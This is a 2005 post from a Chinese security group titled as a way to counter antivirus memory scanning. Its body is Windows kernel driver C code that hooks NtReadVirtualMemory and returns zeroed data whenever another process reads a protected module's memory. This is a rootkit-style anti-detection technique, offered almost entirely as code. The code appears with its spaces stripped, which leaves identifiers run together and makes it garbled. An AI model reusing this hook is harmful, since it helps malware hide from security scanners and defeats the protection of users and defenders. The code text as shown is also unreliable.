Author:Polymorphours
Email:Polymorphours@whitecell.org
Homepage:http://www.whitecell.org
Date:2005-11-17
/*++Author:PolymorphoursDate:2005/1/10通过对NtReadVirtualMemory挂钩,防止其他进程对保护的模块进行扫描,如果发现其他进程读被保护模块的内存,则返回0--*/typedefstruct_LDR_DATA_TABLE_ENTRY{LIST_ENTRYInLoadOrderLinks;LIST_ENTRYInMemoryOrderLinks;LIST_ENTRYInInitializationOrderLinks;PVOIDDllBase;PVOIDEntryPoint;ULONGSizeOfImage;UNICODE_STRINGFullDllName;UNICODE_STRINGBaseDllName;/*+0x034Flags:Uint4B+0x038LoadCount:Uint2B+0x03aTlsIndex:Uint2B+0x03cHashLinks:_LIST_ENTRY+0x03cSectionPointer:Ptr32Void+0x040CheckSum:Uint4B+0x044TimeDateStamp:Uint4B+0x044LoadedImports:Ptr32Void+0x048EntryPointActivationContext:Ptr32Void+0x04cPatchInformation:Ptr32Void*/}LDR_DATA_TABLE_ENTRY,*PLDR_DATA_TABLE_ENTRY;/*++函数名:MyNtReadVirtualMemory参数:INHANDLEProcessHandle,INPVOIDBaseAddress,OUTPVOIDBuffer,INULONGBufferLength,OUTPULONGReturnLengthOPTIONAL功能:隐藏保护模块的内存,如果发现有内存扫描到这块内存,则返回加密后的数据扰乱扫描过程返回:NTSTATUS--*/NTSTATUSMyNtReadVirtualMemory(INHANDLEProcessHandle,INPVOIDBaseAddress,OUTPVOIDBuffer,INULONGBufferLength,OUTPULONGReturnLengthOPTIONAL){NTSTATUSstatus;PEPROCESSeProcess;PVOIDPeb;PPEB_LDR_DATAPebLdrData;PLDR_DATA_TABLE_ENTRYLdrDataTableHeadList;PLDR_DATA_TABLE_ENTRYLdrDataTableEntry;PLIST_ENTRYBlink;PPROTECT_NODEFileNode=NULL;BOOLEANbHideFlag=FALSE;ULONGImageMaxAddress=0;/*#ifdef_DEBUGDbgPrint("CallProcess:%s,BaseAddress:%08xn",PsGetProcessImageFileName(
PsGetCurrentProcess()),BaseAddress);#endif*/status=ObReferenceObjectByHandle(ProcessHandle,FILE_READ_DATA,PsProcessType,KernelMode,(PVOID)&eProcess,NULL);if(NT_SUCCESS(status)){////得到PEB的地址//Peb=(PVOID)(*(PULONG)((PCHAR)eProcess+PebOffset));////切换到目标进程空间//KeAttachProcess(eProcess);////判断PEB是否有效,如果有效,那么准备利用PEB结构遍历进程加载的模块//if(!MmIsAddressValid(Peb)){/*#ifdef_DEBUGDbgPrint("PEBiserror.n");#endif*/KeDetachProcess();ObDereferenceObject(eProcess);gotoCLEANUP;}PebLdrData=(PPEB_LDR_DATA)(*(PULONG)((PCHAR)Peb+0xc));if(!PebLdrData){KeDetachProcess();ObDereferenceObject(eProcess);gotoCLEANUP;}try{ProbeForRead(PebLdrData,sizeof(PEB_LDR_DATA),sizeof(ULONG));////遍历模块链表//LdrDataTableHeadList=(PLDR_DATA_TABLE_ENTRY)PebLdrData
->InLoadOrderModuleList.Flink;LdrDataTableEntry=LdrDataTableHeadList;do{ProbeForRead(LdrDataTableEntry,sizeof(LDR_DATA_TABLE_ENTRY),sizeof(ULONG));if(!LdrDataTableEntry->DllBase){LdrDataTableEntry=(PLDR_DATA_TABLE_ENTRY)LdrDataTableEntry
->InLoadOrderLinks.Flink;continue;}////判断读的内存属于那一个模块,如果都不属于,那么放过//ImageMaxAddress=(ULONG)((ULONG)LdrDataTableEntry->DllBase+
LdrDataTableEntry->SizeOfImage);if((ULONG)((ULONG)BaseAddress+BufferLength)<
(ULONG)LdrDataTableEntry->DllBase||(ULONG)BaseAddress>ImageMaxAddress){////如果不是读模块区域,那么枚举下一个//LdrDataTableEntry=(PLDR_DATA_TABLE_ENTRY)LdrDataTableEntry->
InLoadOrderLinks.Flink;continue;}////如果是被保护的模块,那么返回虚假数据//bHideFlag=FALSE;Blink=ProtectFile.Blink;while(Blink!=&ProtectFile){FileNode=CONTAINING_RECORD(Blink,PROTECT_NODE,ActiveLink);////如果发现当前文件存在于隐藏列表,那么设置隐藏标志隐藏它//if(wcsstr(FileNode->ProtectName,Ldr
DataTableEntry->FullDllName.Buffer)){bHideFlag=TRUE;break;}Blink=Blink->Blink;}if(bHideFlag){////返回原本的进程空间进行处理//KeDetachProcess();ObDereferenceObject(eProcess);ProbeForWrite(Buffer,BufferLength,sizeof(ULONG));memset(Buffer,0x00,BufferLength);ProbeForWrite(ReturnLength,sizeof(PULONG),sizeof(ULONG));*ReturnLength=BufferLength;returnSTATUS_SUCCESS;}LdrDataTableEntry=(PLDR_DATA_TABLE_ENTRY)LdrDataTableEntry
->InLoadOrderLinks.Flink;}while(LdrDataTableEntry!=LdrDataTableHeadList);}except(EXCEPTION_EXECUTE_HANDLER){if(!bHideFlag){KeDetachProcess();ObDereferenceObject(eProcess);}gotoCLEANUP;}KeDetachProcess();ObDereferenceObject(eProcess);}CLEANUP:returnNtReadVirtualMemory(ProcessHandle,BaseAddress,Buffer,BufferLength,ReturnLength);}
WSS(WhitecellSecuritySystems),一个非营利性民间技术组织,致力于各种系统安全技术的研究。坚持传统的hacker精神,追求技术的精纯。
WSS主页:http://www.whitecell.org/
WSS论坛:http://www.whitecell.org/forums/
【对抗杀毒软件的内存扫描】相关文章:
★ 典型入侵日志分析